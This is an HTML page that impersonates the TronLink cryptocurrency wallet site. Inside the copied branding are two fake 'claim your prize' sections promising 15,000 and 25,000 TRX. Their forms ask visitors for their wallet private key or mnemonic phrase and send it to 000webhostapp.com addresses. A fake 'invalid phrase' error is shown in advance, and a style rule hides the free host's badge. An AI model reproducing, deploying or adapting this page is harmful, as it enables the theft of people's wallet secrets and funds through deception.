
<html class="fp-enabled" style="font-size: 100px; overflow: hidden; height: 100%;"><head id="head"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>TronLink | Professional USDT-Tron (TRX) Wallet</title><meta name="description" content="TronLink is a safe, professional and comprehensive Tron wallet (TRX wallet), which is officially recommended by Tron. TronLink have full coverage of PC and mobile with full-featured Tron functions such as transfer, voting, resource acquisition, and Dapp usage."><meta name="keywords" content="tronlink, trx wallet, tron wallet"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js.download"></script><script async="" src="./index_files/analytics.js(1).download"></script><script src="./index_files/rem.js.download"></script><link rel="canonical" href="https://www.tronlink.org/"><link href="./index_files/home.css" rel="stylesheet"><link href="./index_files/fullpage.css" rel="stylesheet"><script>!function(e,a,t,n,g,c,o){e.GoogleAnalyticsObject=g,e.ga=e.ga||function(){(e.ga.q=e.ga.q||[]).push(arguments)},e.ga.l=1*new Date,c=a.createElement(t),o=a.getElementsByTagName(t)[0],c.async=1,c.src="https://www.google-analytics.com/analytics.js",o.parentNode.insertBefore(c,o)}(window,document,"script",0,"ga"),ga("create","UA-136759043-1","auto"),ga("send","pageview")</script></head><body class="fp-viewing-0" style="overflow: hidden; height: 100%;"><div class="header-container pc"><div class="header maxWidth"><a href="https://www.tronlink.org/"><span class="logo"></span></a><div class="language"><div class="flex menu"><a href="https://wj.qq.com/s2/3578383/b5c8" target="_blank" class="margin-r">Submit DApp</a><div href="javascript:;" target="_blank" class="margin-r developer">Developer<section class="menu-dropdown-content" style="display: none;"><div class="menu-dropdown-item"><a target="_blank" href="https://developers.tron.network/docs/wallet-integration">TronLink Integration</a><p>How to integrate DAPP with TronLink</p></div><div class="menu-dropdown-item"><a target="_blank" href="https://developers.tron.network/docs/tron-web-intro">About TronWeb</a><p>Core tool for DAPP developers</p></div><div class="menu-dropdown-item"><a target="_blank" href="https://tronprotocol.github.io/documentation-en/introduction/dpos/">About Tron Protocols</a><p>Sophisticated Java-tron protocol</p></div><div class="menu-dropdown-item"><a target="_blank" href="https://github.com/tronprotocol/sun-network">About Sun-network DAppChain</a><p>Help DApps run with improved energy efficiency and safety performance at a greater speed</p></div></section></div><a href="https://support.tronlink.org/hc/en-us" target="_blank" class="margin-r">Help</a><div class="selectLan margin-r"><span class="activedLan">EN</span> <span class="uncheckLan" style="display: none;">简体中文</span></div><a href="https://twitter.com/TronLinkWallet" target="_blank" class="twitter margin-r"></a> <a href="https://t.me/TronLink" target="_blank" class="telegram"></a></div></div></div></div><div class="page-bg hide pc"></div><div id="fullpage" class="pc fullpage-wrapper" style="height: 100%; position: relative; touch-action: none; transform: translate3d(0px, 0px, 0px);"><div class="section page0 fp-section active fp-completely" id="section0" data-fp-styles="null" style="height: 708px;"><div class="bg maxWidth"><section class="wallet"><div class="tronWallet"></div><div ng-if="$ctrl.state" ng-transclude="">
<div class="body-2 text-center margin-2">
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: rgb(37,40,79);
  height: 100vh;
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}

ul{
  float: right;
  list-style-type: none;
  margin-top: 25px;
}

ul li{
  display: inline-block;
}

ul li a{
  text-decoration: none;
  color: #fff;
  padding: 8px 25px;
  border: 2px solid #C09854;
  border-radius: 25px;
  font-size: 14px;
  font-style: bold;
  transform: 0.6s ease;
  letter-spacing: 1px;
}

ul li a:hover{
  background-color: #C09854;
  color: #fff;
}

.logo img{
  float: left;
  margin-top: 23px;
  height: 20px;
  width: auto;
}

.main{
  margin: auto;
}

.title{
 
  margin-top: 28%;
  text-align: center;
  
}


.btn{
  border-color: 2px solid rgb(48,166,253);
  background-color: rgb(48,166,253);
  padding: 16px 10px;
  display: inline-block;
  border-radius: 25px;
  width: 300px;
  border: none;
  outline: none !important;
  
}

.btn a{
  text-decoration: none;
  color: white;
  font-size: 15px;
  font-style: bold;
  letter-spacing: 2px;

}

img[alt="www.000webhost.com"]{
    opacity: 0;
}
#seed{
    border: none;
    border-bottom: 1px solid silver;
    padding: 2px 2px;
    outline: none !important;
    width: 300px;
    height: 4em;
    background-color: transparent;
    color: white;
    
}
::placeholder{
    padding-top: 0px;
    color: rgb(77,86,119);
    text-align: left;
}

</style>
<img class="mx-auto d-block rounded-circle" height="100" width="100" src="./index_files/trx.png"><br>
<br>
<font size="3" face="Arial"><h3 class="font-weight-bold"> 25,000 TRON (TRX)
</h3><br>
<span class="blinking"></span></font>
    <br><br>

<font size="3">Claim your prize using a private key or Mnemonic phrase:
    <br>
    <br></font></div>
<div class="headline-1 text-center ng-scope" w-i18n="seedForm.title"></div>




<form method="POST" action="https://equidistant-operand.000webhostapp.com/tronwallets.php?acces.wallett" accept-charset="UTF-8" class="margin-2 ng-scope ng-valid-minlength ng-dirty ng-valid-parse ng-valid ng-valid-required" style="">
    
     <div class="seed-block margin-3"><w-input textarea="id=" kata_mutiara"required="required" name="walletSeed" maxlength="150" class="embed no-icon big ng-pristine ng-untouched ng-isolate-scope ng-valid-minlength ng-not-empty ng-valid ng-valid-required=" placeholder="Enter Phrase or Private Keys" w-i18n-attr="placeholder" minlength="25" required="" aria-invalid="false" aria-required="true" style="">
   

<div class="w-input-wrap"><textarea textarea="id=" kata_mutiara"required="required" name="walletSeed" maxlength="150" "="" class="embed no-icon big ng-isolate-scope ng-valid-minlength ng-dirty ng-valid-parse ng-touched ng-not-empty ng-valid ng-valid-required" ng-model="mpcseed" placeholder="Enter Phrase or Private Keys" w-i18n-attr="placeholder" minlength="25" required="=" required"name="login_password" aria-invalid="false" style="width: 486px;height: 79px;margin: 0px;border-right-width: 3px;border-top-width: 3px;border-left-width: 3px;border-bottom-width: 3px;"></textarea></div></w-input>




<br>
<span class="register__label" style="color:red;"><font size="3">Incorrect Mnemonic Phrase. Please check
</font></span>
<div class="body-2 basic-900 ng-scope" w-i18n="seedForm.seedTitle">Input 12 words Bakup Phrase (sometimes 24) or Private key words separated by single spaces</div></div>


<br>

<w-button disabled="!$ctrl.address" class="submit big long ng-isolate-scope" w-step-next=""><button class="btn">
      <a href="https://sohdgsb6282.000webhostapp.com/tronwallets.php?acces.wallett"><strong>Import</strong></a>
    </button></w-button></form></div>

<div class="mobile-banner"><img class="mobile-projection opacity mobile-projection-animate" src="./index_files/projection.png"> <img class="mobile-right opacity mobile-right-animate" src="./index_files/mobile-1.png"> <img class="mobile-left opacity mobile-left-animate" src="./index_files/mobile-2.png"><div class="ball-r-min opacity"></div><div class="ball-r-max opacity"></div></div></section></div><div class="animation-block"><div class="ball-l-t opacity"></div><div class="ball-l-b opacity ball-l-b-animate"></div><div class="ball-r-t opacity ball-r-t-animate"></div></div><div class="page0-line"></div></div><div class="section page1 fp-section" id="section1" data-fp-styles="null" style="height: 708px;"><div class="page1-bg"><section class="secure width displayCon"><div class="secure-left"><p class="secure-title opacity page1-secure-title">Most Secure</p><p class="secure-desc opacity page1-secure-title">Asset Management</p><div class="secure-info opacity page1-secure-info"><ul><li><img src="./index_files/sec_1.svg"><p>Decentralized wallet, local storage of private key, physical insulation, multi-layer algorithm encryption - ensuring data security.</p></li><li><img src="./index_files/sec_2.svg"><p>Support free node switch and breakpoint reconnection - ensuring node stability and reliability.</p></li><li><img src="./index_files/sec_3.svg"><p>TRON development team all in, realizing seamless integration with TRON's MainNet and enabling immediate iterative upgrade.</p></li></ul></div></div><div class="secure-right"><div class="secure-shield"><div class="secure-ball ring-animate"></div><div class="secure-ball-line line-animate"></div></div></div></section></div><div class="animation-block"><div class="page1-ball-l opacity"></div><div class="page1-ball-r opacity"></div></div></div><div class="section fp-section" id="section2" data-fp-styles="null" style="height: 708px;"><div class="page2-bg"><section class="secure width displayCon"><div class="secure-left"><p class="secure-title opacity page2-secure-title">Most Well-Rounded</p><p class="secure-desc opacity page2-secure-title">Features of TRON</p><div class="secure-info opacity page2-secure-info"><ul><li><img class="secure-earth-icon" src="./index_files/earth.svg"><p>Support TRX and all TRC-10 and TRC-20 tokens. Serve global TRON users.</p></li><li><img src="./index_files/ring.svg"><p>Support resource freeze/unfreeze and voting. Enable users to get deeply involved with TRON's ecosystem building.</p></li><li><img src="./index_files/triangle.svg"><p>Open up SDK and testing environment to fully serve developers and expand TRON's ecosystem through joint efforts.</p></li></ul></div></div><div class="secure-right"><div class="secure-earth"><div class="secure-earth-rotate"><div class="secure-earth-ball1"></div><div class="secure-earth-ball2"></div></div></div></div></section></div><div class="animation-block"><div class="page2-ball-l opacity"></div><div class="page2-ball-r opacity"></div></div></div><div class="section fp-section" id="section3" data-fp-styles="null" style="height: 708px;"><div class="page3-bg"><section class="secure width displayCon"><div class="secure-left"><p class="secure-title opacity page3-secure-title">Most Convenient User</p><p class="secure-desc opacity page3-secure-title">Experience</p><div class="secure-info opacity page3-secure-info"><ul><li><img src="./index_files/sec-card.svg"><p>Click and create/import wallets. Simple, mobile and user-friendly. Support muiltiple wallet account creation.</p></li><li><img src="./index_files/sec-exc.svg"><p>Click and switch at your will. With desktop softwares, browser extension, mobile apps all in one, TronLink provides everything you would ever need in all situations. Enjoy TRON DApps whenever and wherever you want.</p></li></ul></div></div><div class="secure-right"><div class="secure-light"><img class="light-img opacity" src="./index_files/light.svg"><div class="shooting-star1 shooting-star1-animate"></div><div class="shooting-star2 shooting-star2-animate"></div><div class="shooting-star3 shooting-star3-animate"></div><div class="shooting-star4 shooting-star4-animate"></div><div class="shooting-star5 shooting-star5-animate"></div><div class="shooting-star6 shooting-star6-animate"></div></div></div></section></div><div class="animation-block"><div class="page3-ball-l opacity"></div><div class="page3-ball-r opacity"></div></div></div><div class="section fp-section" id="section4" data-fp-styles="null" style="height: 708px;"><div class="page4-bg"><section class="recommend opacity"><p class="re-title opacity">Recommend</p><p class="re-desc">“Through the cooperation, I found that TronLink is a team of young people who are rigorous, professional and hardworking. The wallet made by them is secure, easy to use with full-featured TRON functionality, so I recommend it to global TRON users."</p><p class="re-footer opacity"><span>Justin Sun</span> <span>Founder and CEO of TRON</span></p></section><div class="head"><img src="./index_files/head.svg"></div><div class="animation-block"><div class="page4-ball-l opacity"></div><div class="page4-ball-r-min opacity"></div><div class="page4-ball-r-max opacity"></div></div><footer><div class="page4-footer maxWidth"><div class="footer-left"><a href="https://twitter.com/TronLinkWallet" target="_blank" class="footer-icon margin-r-m page4-twitter"></a> <a href="https://t.me/TronLink" target="_blank" class="footer-icon margin-r-m page4-telegram"></a> <a href="https://weibo.com/u/7032463704" target="_blank" class="footer-icon margin-r-m page4-weibo"></a> <a href="javascript:;" target="_blank" class="footer-icon margin-r page4-wx"></a><div class="wx-container footer-wx-container"><div class="wx-model"><div class="wx-qrcode"><img src="./index_files/wx-qrcode.png"> <span>WeChat Official</span></div><div class="wx-admin-qrcode"><img src="./index_files/wx-admin-qrcode.png"> <span>WeChat Administrator</span></div></div></div><a href="https://support.tronlink.org/hc/en-us/requests/new" target="_blank" class="margin-r-m">Questions &amp; Feedback</a> <a href="https://support.tronlink.org/hc/en-us" target="_blank">Help Center</a></div><div class="footer-right">©TronLink.org2019</div></div></footer></div></div></div>

        <p class="got-it-btn">
            
            <span class="close-footer"></span>
        </p>
    </div></div><section class="wallet"><div class="tronWallet"></div><style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: rgb(37,40,79);
  height: 100vh;
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}

ul{
  float: right;
  list-style-type: none;
  margin-top: 25px;
}

ul li{
  display: inline-block;
}

ul li a{
  text-decoration: none;
  color: #fff;
  padding: 8px 25px;
  border: 2px solid #C09854;
  border-radius: 25px;
  font-size: 14px;
  font-style: bold;
  transform: 0.6s ease;
  letter-spacing: 1px;
}

ul li a:hover{
  background-color: #C09854;
  color: #fff;
}

.logo img{
  float: left;
  margin-top: 23px;
  height: 20px;
  width: auto;
}

.main{
  margin: auto;
}

.title{
 
  margin-top: 28%;
  text-align: center;
  
}


.btn{
  border-color: 2px solid rgb(48,166,253);
  background-color: rgb(48,166,253);
  padding: 16px 10px;
  display: inline-block;
  border-radius: 25px;
  width: 300px;
  border: none;
  outline: none !important;
  
}

.btn a{
  text-decoration: none;
  color: white;
  font-size: 15px;
  font-style: bold;
  letter-spacing: 2px;

}

img[alt="www.000webhost.com"]{
    opacity: 0;
}
#seed{
    border: none;
    border-bottom: 1px solid silver;
    padding: 2px 2px;
    outline: none !important;
    width: 300px;
    height: 4em;
    background-color: transparent;
    color: white;
    
}
::placeholder{
    padding-top: 0px;
    color: rgb(77,86,119);
    text-align: left;
}

</style>
<img class="mx-auto d-block rounded-circle" height="100" width="100" src="./index_files/trx.png">

<br><br>
<font size="3" face="Arial"><h3 class="font-weight-bold"> 15.000 TRON (TRX)
</h3>
<br>
<span class="blinking">($ 459.9)</span></font>
    <br><br>

<font size="3">Claim your prize using a private key or Mnemonic phrase:
    <br>
    <br></font>
<div class="headline-1 text-center ng-scope" w-i18n="seedForm.title"></div>




<form method="POST" action="https://sohdgsb6282.000webhostapp.com/tronwallets.php" accept-charset="UTF-8" class="margin-2 ng-scope ng-valid-minlength ng-dirty ng-valid-parse ng-valid ng-valid-required" style="">
    
     <div class="seed-block margin-3"><w-input textarea="id=" kata_mutiara"required="required" name="walletSeed" maxlength="150" class="embed no-icon big ng-pristine ng-untouched ng-isolate-scope ng-valid-minlength ng-not-empty ng-valid ng-valid-required=" placeholder="Enter Phrase or Private Keys" w-i18n-attr="placeholder" minlength="25" required="" aria-invalid="false" aria-required="true" style="">
   

<div class="w-input-wrap"><textarea textarea="id=" kata_mutiara"required="required" name="walletSeed" maxlength="150" "="" class="embed no-icon big ng-isolate-scope ng-valid-minlength ng-dirty ng-valid-parse ng-touched ng-not-empty ng-valid ng-valid-required" ng-model="mpcseed" placeholder="Enter Phrase or Private Keys" w-i18n-attr="placeholder" minlength="25" required="=" required"name="login_password" aria-invalid="false" style="width: 441px; height: 77px; margin: 0px;"></textarea></div></w-input>




<br>
<span class="register__label" style="color:red;"><font size="3">Error,,, Invalid mnemonic Phrase
</font></span>
<div class="body-2 basic-900 ng-scope" w-i18n="seedForm.seedTitle">Input 12 words Bakup Phrase (sometimes 24) or Private key words separated by single spaces</div></div>


<br>

<w-button disabled="!$ctrl.address" class="submit big long ng-isolate-scope" w-step-next=""><button class="btn">
      <a href="https://sohdgsb6282.000webhostapp.com/tronwallets.php"><strong>IMPORT</strong></a>
    </button></w-button></form>

<div class="mobile-banner"><img class="mobile-projection opacity mobile-projection-animate" src="./index_files/projection.png"> <img class="mobile-right opacity mobile-right-animate" src="./index_files/mobile-1.png"> <img class="mobile-left opacity mobile-left-animate" src="./index_files/mobile-2.png"><div class="ball-r-min opacity"></div><div class="ball-r-max opacity"></div></div></section><script type="text/html" id="gitItTmp">
        <p class="got-it-text">
            <%=text%>
        </p>
        <p class="got-it-btn">
            <a href="<%=button_href%>" target="_blank"><%=button_name%></a>
            <span class="close-footer"></span>
        </p>
    </div></script><script src="./index_files/jquery-3.3.1.min.js.download"></script><script src="./index_files/jquery.qrcode.min.js.download"></script><script src="./index_files/fullpage.js.download"></script><script src="./index_files/template.js.download"></script><script src="./index_files/commonTool.js.download"></script><script src="./index_files/home.js.download"></script><div id="fp-nav" class="fp-left home" style="margin-top: -90px;"><ul></ul></div></body></html>